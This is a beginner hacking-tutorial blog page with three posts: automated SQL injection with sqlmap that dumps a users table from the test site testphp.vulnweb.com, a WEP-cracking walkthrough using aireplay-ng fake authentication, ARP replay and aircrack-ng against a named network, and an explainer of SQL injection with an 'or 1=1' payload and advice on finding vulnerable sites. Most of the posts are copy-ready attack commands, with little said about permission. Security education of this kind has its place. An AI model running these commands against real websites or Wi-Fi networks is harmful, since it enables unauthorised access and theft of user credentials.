Hacking Website with Sqlmap in Kali Linux

A screenshot from the SQLmap official website

In the previous tutorial, we hacked a website using nothing but a simple browser on a Windows machine. It was a pretty clumsy method to say the least. However, knowing the basics is necessary before we move on to the advanced tools. In this tutorial, we'll be using Kali Linux (see the top navigation bar to find how to install it if you haven't already) and SqlMap (which comes preinstalled in Kali) to automate what we manually did in the Manual SQL Injection tutorial to hack websites.




Now it is recommended that you go through the above tutorial once so that you can get an idea about how to find vulnerable sites. In this tutorial we'll skip the first few steps in which we find out whether a website is vulnerable or not, as we already know from the previous tutorial that this website is vulnerable.

Kali Linux

First off, you need to have Kali linux (or backtrack) up and running on your machine. Any other Linux distro might work, but you'll need to install Sqlmap on your own. Now if you don't have Kali Linux installed, you might want to go to this page, which will get you started on Beginner Hacking Using Kali Linux

Sqlmap

Basically its just a tool to make Sql Injection easier. Their official website  introduces the tool as -"sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections."

A lot of features can be found on the SqlMap website, the most important being - "Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems." That's basically all the database management systems. Most of the time you'll never come across anything other than MySql. 

Hacking Websites Using Sqlmap in Kali linux

Sql Version

Boot into your Kali linux machine. Start a terminal, and type -

sqlmap -h

It lists the basic commands that are supported by SqlMap. To start with, we'll execute a simple command
sqlmap -u <URL to inject>. In our case, it will be-

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1

Sometimes, using the --time-sec helps to speed up the process, especially when the server responses are slow.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15

Either ways, when sqlmap is done, it will tell you the Mysql version and some other useful information about the database.

The final result of the above command should be something like this.

Note: Depending on a lot of factors, sqlmap my sometimes ask you questions which have to be answered in yes/no. Typing y means yes and n means no. Here are a few typical questions you might come across-

• Some message saying that the database is probably Mysql, so should sqlmap skip all other tests and conduct mysql tests only. Your answer should be yes (y).
• Some message asking you whether or not to use the payloads for specific versions of Mysql. The answer depends on the situation. If you are unsure, then its usually better to say yes.

Enumeration

Database

In this step, we will obtain database name, column names and other useful data from the database.

List of  a few common enumeration commands

So first we will get the names of available databases. For this we will add --dbs to our previous command. The final result will look like -

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

 So the two databases are acuart and information schema.

Table

Now we are obviously interested in acuart database. Information schema can be thought of as a default table which is present on all your targets, and contains information about structure of databases, tables, etc., but not the kind of information we are looking for. It can, however, be useful on a number of occasions. So, now we will specify the database of interest using -D and tell sqlmap to enlist the tables using --tables command. The final sqlmap command will be-

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

The result should be something like this -
Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+
Now we have a list of tables. Following the same pattern, we will now get a list of columns.

Columns

Now we will specify the database using -D, the table using -T, and then request the columns using --columns. I hope you guys are starting to get the pattern by now. The most appealing table here is users. It might contain the username and passwords of registered users on the website (hackers always look for sensitive data).

The final command must be something like-

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns

The result would resemble this-

Data

Now, if you were following along attentively, now we will be getting data from one of the columns. While that hypothesis is not completely wrong, its time we go one step ahead. Now we will be getting data from multiple columns. As usual, we will specify the database with -D, table with -T, and column with -C. We will get all data from specified columns using --dump. We will enter multiple columns and separate them with commas. The final command will look like this.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump

 Here's the result

John Smith, of course. And the password is test. Email is email@email.com?? Okay, nothing great, but in the real world web pentesting, you can come across more sensitive data. Under such circumstances, the right thing to do is mail the admin of the website and tell him to fix the vulnerability ASAP. Don't get tempted to join the dark side. You don't look pretty behind the bars. That's it for this tutorial. Try to look at other columns and tables and see what you can dig up. Take a look at the previous tutorial on Manual SQl Injection which will help you find more interesting vulnerable sites.

Read full post »

Speeding Up WEP Hacking In Kali

Now if you have followed the basic WEP hacking tutorial, and have also read the basic troubleshooting guide, then you are ready to proceed to the stage where you follow an intermediate level hacking tutorial. In this tutorial, we will look at the intricate details of what is happening and approach the complicated methods and concepts.




To start with, I'll address a common question which was asked on my previous posts.

14 March 2014 19:28

i couldn't find any wlan when i write ifconfig in terminal

1. 
   
   
   
   
   Are you using Kali Linux on a virtual machine. Please note that a wireless adapter can only be used by only one machine at a time. Your host machine has access to the wireless adapter, not the virtual machine. This question has been discussed at length on superuser forums. The conclusion is that you can't directly connect internal wifi card using any Virtual machine software-
   "Unfortunately no virtualization software allows for direct access to hardware devices like that.
   
   Compare VirtualBox with VMware Fusion and Parallels for Mac. All 3 of those programs behave the same way. The only devices that can be directly accessed are usb devices. Everything else is abstracted though the virtualization engine. (Though you could argue that the vm has lower level access to cd rom's and storage devices).
   
   I wish I could give you a better answer, than simply to buy a usb wireless card."
   Basically you have to buy an external wireless card. They aren't very expensive. I personally use two of them myself. If you want to see what I use, take a look here, http://beginnnerhacking.blogspot.in/2014/02/creating-dummy-wifi-for-hacking.html

So basically you have 2 choices. First, you can buy a new external wireless adapter (no referral links here). Secondly, you can side install Kali with Windows or run it via a USB. A virtual machine can only use computer hardware if it is externally connected via USB. Now there is another catch here. The internal adapters, almost all of them, don't support injection. This is extremely important for speeding up wireless hacking. So if you really want to go in depth of wireless hacking, then its time to buy an external adapter or two (the more the better). If that's not a possibility, you might want to spend hours trying to get a driver which might make your internal adapter support injection (I don't know anyone who succeeded in this, but it might be possible).

Kali Linux

I don't know why it needs mention here, but still, if you don't have Kali Linux (or Backtrack) installed yet, you will have to install it before you can start this tutorial. Here is the tutorial on Kali Linux hacking.

Check Injection Support

Aircrack-ng has a comprehensive article related to checking injection support. You might check their website out for it. I am just providing the commands which will be enough to find out whether injection is working or not. 

airmon-ng start wlan0  [or wlan1]

(Puts your wireless adapter in monitor mode. From now we'll refer to wlan0/wlan1 as mon0

airserv-ng -d mon0

 aireplay-ng -9 127.0.0.1:666

This basically sets up a temporary server sort of thing that is waiting for you to test your injection capabilities. The second command actually tries to inject the server, and succeeds. 127.0.0.1 is the IP which is reserved for loopback. It is always used when you are carrying out some command on yourself. 666 is the port we are using. Most of the time, what follows an IP and a colon is the port. The general form is somewhat like IP:port. So finally you have checked your injection capabilities, and the last line - "Injection is working!" should bring a smile to your face. If not, you'll have to buy a card which supports injection, or see some forum posts which will help you figure something out.

Check Signal Strength

While the basic hacking methods from the previous post don't have any real strength restriction, you need to be physically close to the access point in order to inject packets. There is information regarding the same in the same aircrack-ng tutorial. Again, I'm gonna summarize what you have to do here.

First, we will use airodump-ng mon0 to see the list of networks in range. See the one you want to hack.

Airodump-ng lists the networks in range.

Now we will hack the digisol network. Make a note of the BSSID of the network you want to hack.  A good practice is to store all the information gathered in any text editor. We should, at this stage, take a note of following:-

• ESSID -  DIGISOL
• BSSID - 00:17:7C:22:CB:80
• CH (channel) - 2
• Mac address of genuine users connected to the network:
• Interface : wlan1 - referred to as mon0

You should gather the equivalent information for the network you will be working on. Then just change the values whenever I use them in any of the commands

Note : We need at least one user (wired or wireless) connected to the network and using it actively. The reason is that this tutorial depends on receiving at least one ARP request packet and if there are no active clients then there will never be any ARP request packets.

Now, to check whether the signal strength will be sufficient, we will simply execute the following code-

airodump-ng [interface] -c [channel]

airodump-ng mon0 -c 2

This will make the wireless card only read packets in the channel no. 2, on which our target network is.

Now to test the network, type the following code-

aireplay-ng --test -e DIGISOL -a 00:17:7C:22:CB:80 mon0 

 The last time we checked whether the wireless card had the capability to inject packets. We tested it on our own computer. This time, we actually injected packets into the target computer. If this worked, then it's pretty good news, and it means that you are most probably going to be able to hack this network. The last line 30/30 : 100% determines how good the strength of the signal is. A very high percentage is a good sign, and 100 is ideal.

Capture Packets

Now we have already run airodump-ng a couple of times. However, this time we will pass the -w command which will instruct airodump-ng to save the output to a file.

airodump-ng -c [channel] --bssid [bssid]-w [file_name] [interface]

airodump-ng -c 2 --bssid 00:17:7C:22:CB:80 -w dump mon0

 Now the output will be saved in a file  dump-01.cap
Now we can keep this terminal running and it will keep saving the packets.  [In the previous tutorial we did only 2 things, capture the packet, i.e this step, and crack it, i.e. the step we are going to do last. While it makes our work easier to just follow two steps, it also makes the process much more time consuming, since we are simply a passive packet listener, who is not doing anything]

Speeding Things Up

Fake Authentication

Now to speed things up, we will inject the network. We will thus obtain ARP packets. These packets will fill up the data column of our airodump-ng capture, and data is what will help us obtain the password. As soon as we have 10000 data packets, we can start attempting to get the password using aircrack-ng.

Now to make the AP pay attention to your injected packets, you either have to be a connected client, or have to pretend to be one. You can either mask your mac address to one of the already connected clients, or use the fake authentication feature. We will do the latter. (If you see an error like the AP is on channel x and mon0 is on channel y then go to the bottom of the post for troubleshooting)

aireplay-ng -1 0 -e DIGISOL -a  00:17:7C:22:CB:80 mon0

Authenticated and capturing packets

 ARP request replay mode

ARP packets are your best bet at getting a lot of IVs or data. Without IVs you can't hack a network. Enter the following code to make aireplay-ng listen to the AP for ARP packets, and inject them as soon as they find one. This will create a lot of data very fast. This is the real speeding step. 

aireplay-ng -3 -b [BSSID] mon0

This is what the final code will look like-

aireplay-ng -3 -b  00:17:7C:22:CB:80 mon0

This is what it'll look like in the beginning

 Now you'll have to wait for some time till it gets an ARP request. As soon as it gets one, the terminal will sort of explode. And the data packets will start filling in with Godspeed. Now this is the part where an active user on the network is absolutely necessary.

Slow start

Everything got fine after some time

After some time I had enough packets to crack almost any network

The data filled in VERY fast

The video shows how fast the IVs flowed in after ARP injection started.

Cracking the network

Cracking the network is as easy as typing the following into the console

aircrack-ng name_of_file-01.cap

In our case, the command will be

aircrack-ng dump-01.cap

 After pressing enter, you will have a list of networks and you'll be prompted to select which one of them to hack. In my case there was just one network, so I couldn't get that screen, or a screenshot. The password was cracked in less than a second.

I have blurred out the password and some random stuff.

So finally you have obtained the password of the network you were trying to hack.

Troubleshooting

A person commented on another wireless hacking post. This is the problem he faced.

whenever i try to use aireplay-ng, with the options, always fail saying that mon0 is in channel -1 and the target is in other channel. How can i fixed this? i looked a lot for a real answer but nobody know what is this.

This is a possible solution

Okay, try the following-
1) When you start the monitor mode, specify the channel - 
usage: airmon-ng [channel or frequency]
Your code : airmon-ng start wlan0 6
Substitute 6 with the required channel.
2) While starting airodump, specify the channel
airodump-ng mon0 -c 6

I was facing this problem when my mon0 kept hopping from one channel to the other, and the second step alone solved my problem. If your airmon-ng assigns itself a fixed channel on its own will, without you even specifying it, then the problem might be more complicated. If the above steps don't solve the problem, take a look here - http://ubuntuforums.org/showthread.php?t=1598930

Read full post »

SQL Injection : How It Works

Introduction

Lets get started at an apparently unrelated point. Lets assume we create a table in SQL. Now there are three main parts of a database management system, like SQL. They are -

• Creating structure of table
• Entering data
• Making queries (and getting meaningful results from data)

Now, when SQL is used to display data on a web page, it is common to let web users input their own queries. For example, if you go to a shopping website to buy a smartphone, you might want to specify what kind of smartphone you want. The site would probably be storing data about phones in table with columns like Name, Price, Company, Screen Size, OS, etc.

Now they allow you to create a query using some sort of user friendly drop down based form which lets you select your budget, preferred company, etc. So basically, you, the user, can create queries and request data from their SQL servers. 

Now this automated method of creating queries for you is relatively safe, there is another method of creating queries which can be exploited by us. A url ending in .php is a direct indication that the website/blog uses sql to deliver a lot of it's data, and that you can execute queries directly by changing the url. Now basically the data in the SQL tables is protected. However, when we send some rogue commands to the SQL server, it doesn't understand what to do, and returns an error. This is a clear indication that with proper coding, we can send queries that will make the database 'go berserk' and malfunction, and give us all the otherwise private data of its tables. This attack can be used to obtain confidential data like a list of username and passwords of all users on a website.

Steps

1. We have to find a website which is vulnerable to SQL injection (SQLi) attacks. Vulnerability has 2 criteria. Firstly, it has to allow execution of queries from the url, and secondly, it should show an error for some kind of query or the other. An error is an indication of a SQL vulnerability.
2. After we know that a site is vulnerable, we need to execute a few queries to know what all makes it act in an unexpected manner. Then we should obtain information about SQL version and the number of tables in database and columns in the tables.
3. Finally we have to extract the information from the tables.

Vulnerabilities are found using your own creativity along with famous dorks (more on this in a later tutorial)

For the 2nd and 3rd step, there are 2 ways to do them-

• Manually using some standard codes available online (and if you know SQL then you can figure most of the stuff out yourself). For example, you can instruct the database to give you all the data from a table by executing the command- 

SELECT * FROM Users WHERE UserId = 105 or 1=1

Now, while the first part of the query "UserID=105" may not be true for all user, the condition 1=1 will always be true. So basically the query will be prompted to  return all the data about the user for all the users for whom 1=1. Effectively, you have the username and passwords and all other information about all the users of the website.

The first command is legit and gives you access to data of srinivas only, and only in the condition where the password is correct. The second statement gives you access to data of all accounts.

• Using some tool - Some tools help in making the process easier. You still have to use commands but using tools is much more practical after you have an idea what is actually happening. I don't recommend all the GUI Windows tools which are found on malware filled websites, and never work. All throughout this blog we have used Kali Linux, and if you really are serious about hacking, there is no reason not to have Kali linux installed. In Kali linux, there is a great tool called SQLMap that we'll be using.

That's it for this tutorial, you now know how SQL Injections work. It might be worth your time learning some SQL on W3schools till I come up with some other tutorial. Also, check out the navigation bar at the top of the blog to see if you find something that interests you. We have a lot of tutorials for beginners in the field of hacking.
If you would like to go ahead, then here is the next tutorial in the SQL injection series-

Hacking Websites Using SQL Injection Manually

Also, a tutorial on automated Sql injection is finally here. Take a look

Sql Injection Using sqlmap in kali linux

Read full post »